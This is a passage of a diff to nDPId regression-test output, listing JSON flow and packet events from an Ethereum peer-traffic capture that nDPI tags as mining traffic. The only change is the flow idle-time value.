-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1578508364957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364957,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGw5PR+vDNwKgBuHZf3T7\/g0hGkL7bbKAScSAsgwAAAgQFrAQCCAoN8FcJItiVxgEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1578508364957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364957,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGtZvAqAG40frwzd0+dl+Qvtts\/4NIR4AQECy8HAAAAQEICiLYleUN8FcJ"} 
-00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":490,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364924,"flow_last_seen":1578508364958,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1578508364958,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.250.240.205","src_port":56638,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1578508364990,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364990,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGxNei5B2gwKgBuHZf3TsLfbp+uLewXqAScSA1yAAAAgQFrAQCCArR1xFdItiVcAEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1578508364990,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364990,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGt9\/AqAG4ouQdoN07dl+4t7BeC326f4AQECzE7QAAAQEICiLYlgPR1xFd"} 
-00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":493,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364832,"flow_last_seen":1578508364991,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":413,"flow_tot_l4_payload_len":413,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1578508364991,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.228.29.160","src_port":56635,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":567,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365009,"flow_last_seen":1578508365009,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365009,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"144.91.120.135","src_port":56641,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1578508365009,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365009,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGb3XAqAG4kFt4h91Bdl90OGLhAAAAALAC\/\/+IEgAAAgQFtAEDAwUBAQgKItiWFAAAAAAEAgAA"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":568,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365021,"flow_last_seen":1578508365021,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365021,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.10.218","src_port":56642,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":568,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1578508365021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365021,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGuz\/AqAG4sj4K2t1Cdl8xVnl5AAAAALAC\/\/8AHAAAAgQFtAEDAwUBAQgKItiWHgAAAAAEAgAA"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":569,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365029,"flow_last_seen":1578508365029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365029,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.29.183","src_port":56643,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1578508365029,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365029,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGqGLAqAG4sj4dt91Ddl+W2yuDAAAAALAC\/\/\/VpgAAAgQFtAEDAwUBAQgKItiWJgAAAAAEAgAA"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":598,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365038,"flow_last_seen":1578508365038,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365038,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.230.108.42","src_port":56644,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":598,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1578508365038,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365038,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG\/kfAqAG4DeZsKt1Edl+KMGOvAAAAALAC\/\/8AAwAAAgQFtAEDAwUBAQgKItiWLQAAAAAEAgAA"} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":605,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1578508365039,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365039,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGe3mQW3iHwKgBuHZf3UEpl2emdDhi4qAScSAVuAAAAgQFrAQCCArbhaVwItiWFAEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":606,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1578508365039,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365039,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGb4HAqAG4kFt4h91Bdl90OGLiKZdnp4AQECylVgAAAQEICiLYli7bhaVw"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365009,"flow_last_seen":1578508365040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1578508365040,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"144.91.120.135","src_port":56641,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365045,"flow_last_seen":1578508365045,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365045,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"185.219.133.62","src_port":56645,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1578508365045,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365045,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGOT7AqAG4uduFPt1Fdl+PNscoAAAAALAC\/\/\/ScwAAAgQFtAEDAwUBAQgKItiWMgAAAAAEAgAA"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1578508365063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365063,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACMG2uES26efwKgBuHZf3T9fy8\/Lfuf1H6ASaN8cNgAAAgQFrAQCCAoSyYNbItiVzQEDAwc="} 
-00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1578508365063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365063,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGvenAqAG4Etunn90\/dl9+5\/UfX8vPzIAQECyjNQAAAQEICiLYlkUSyYNb"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364932,"flow_last_seen":1578508365065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":521,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1578508365065,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":56639,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1578508365065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365065,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGx0OyPgrawKgBuHZf3UIGbP5HMVZ5eqAScSDZAAAAAgQFrAQCCAoLgra+ItiWHgEDAwc="} 
-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1578508365065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365065,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGu0vAqAG4sj4K2t1Cdl8xVnl6Bmz+SIAQECxokQAAAQEICiLYlkYLgra+"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1578508364957,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364957,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGw5PR+vDNwKgBuHZf3T7\/g0hGkL7bbKAScSAsgwAAAgQFrAQCCAoN8FcJItiVxgEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1578508364957,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364957,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGtZvAqAG40frwzd0+dl+Qvtts\/4NIR4AQECy8HAAAAQEICiLYleUN8FcJ"} 
+00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":490,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364924,"flow_last_seen":1578508364958,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1578508364958,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.250.240.205","src_port":56638,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1578508364990,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364990,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGxNei5B2gwKgBuHZf3TsLfbp+uLewXqAScSA1yAAAAgQFrAQCCArR1xFdItiVcAEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1578508364990,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364990,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGt9\/AqAG4ouQdoN07dl+4t7BeC326f4AQECzE7QAAAQEICiLYlgPR1xFd"} 
+00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":493,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364832,"flow_last_seen":1578508364991,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":413,"flow_tot_l4_payload_len":413,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1578508364991,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.228.29.160","src_port":56635,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":567,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365009,"flow_last_seen":1578508365009,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365009,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"144.91.120.135","src_port":56641,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1578508365009,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365009,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGb3XAqAG4kFt4h91Bdl90OGLhAAAAALAC\/\/+IEgAAAgQFtAEDAwUBAQgKItiWFAAAAAAEAgAA"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":568,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365021,"flow_last_seen":1578508365021,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365021,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.10.218","src_port":56642,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":568,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1578508365021,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365021,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGuz\/AqAG4sj4K2t1Cdl8xVnl5AAAAALAC\/\/8AHAAAAgQFtAEDAwUBAQgKItiWHgAAAAAEAgAA"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":569,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365029,"flow_last_seen":1578508365029,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365029,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.29.183","src_port":56643,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1578508365029,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365029,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGqGLAqAG4sj4dt91Ddl+W2yuDAAAAALAC\/\/\/VpgAAAgQFtAEDAwUBAQgKItiWJgAAAAAEAgAA"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":598,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365038,"flow_last_seen":1578508365038,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365038,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.230.108.42","src_port":56644,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":598,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1578508365038,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365038,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG\/kfAqAG4DeZsKt1Edl+KMGOvAAAAALAC\/\/8AAwAAAgQFtAEDAwUBAQgKItiWLQAAAAAEAgAA"} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":605,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1578508365039,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365039,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGe3mQW3iHwKgBuHZf3UEpl2emdDhi4qAScSAVuAAAAgQFrAQCCArbhaVwItiWFAEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":606,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1578508365039,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365039,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGb4HAqAG4kFt4h91Bdl90OGLiKZdnp4AQECylVgAAAQEICiLYli7bhaVw"} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365009,"flow_last_seen":1578508365040,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1578508365040,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"144.91.120.135","src_port":56641,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365045,"flow_last_seen":1578508365045,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365045,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"185.219.133.62","src_port":56645,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1578508365045,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365045,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGOT7AqAG4uduFPt1Fdl+PNscoAAAAALAC\/\/\/ScwAAAgQFtAEDAwUBAQgKItiWMgAAAAAEAgAA"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1578508365063,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365063,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACMG2uES26efwKgBuHZf3T9fy8\/Lfuf1H6ASaN8cNgAAAgQFrAQCCAoSyYNbItiVzQEDAwc="} 
+00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1578508365063,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365063,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGvenAqAG4Etunn90\/dl9+5\/UfX8vPzIAQECyjNQAAAQEICiLYlkUSyYNb"} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364932,"flow_last_seen":1578508365065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":521,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1578508365065,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":56639,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 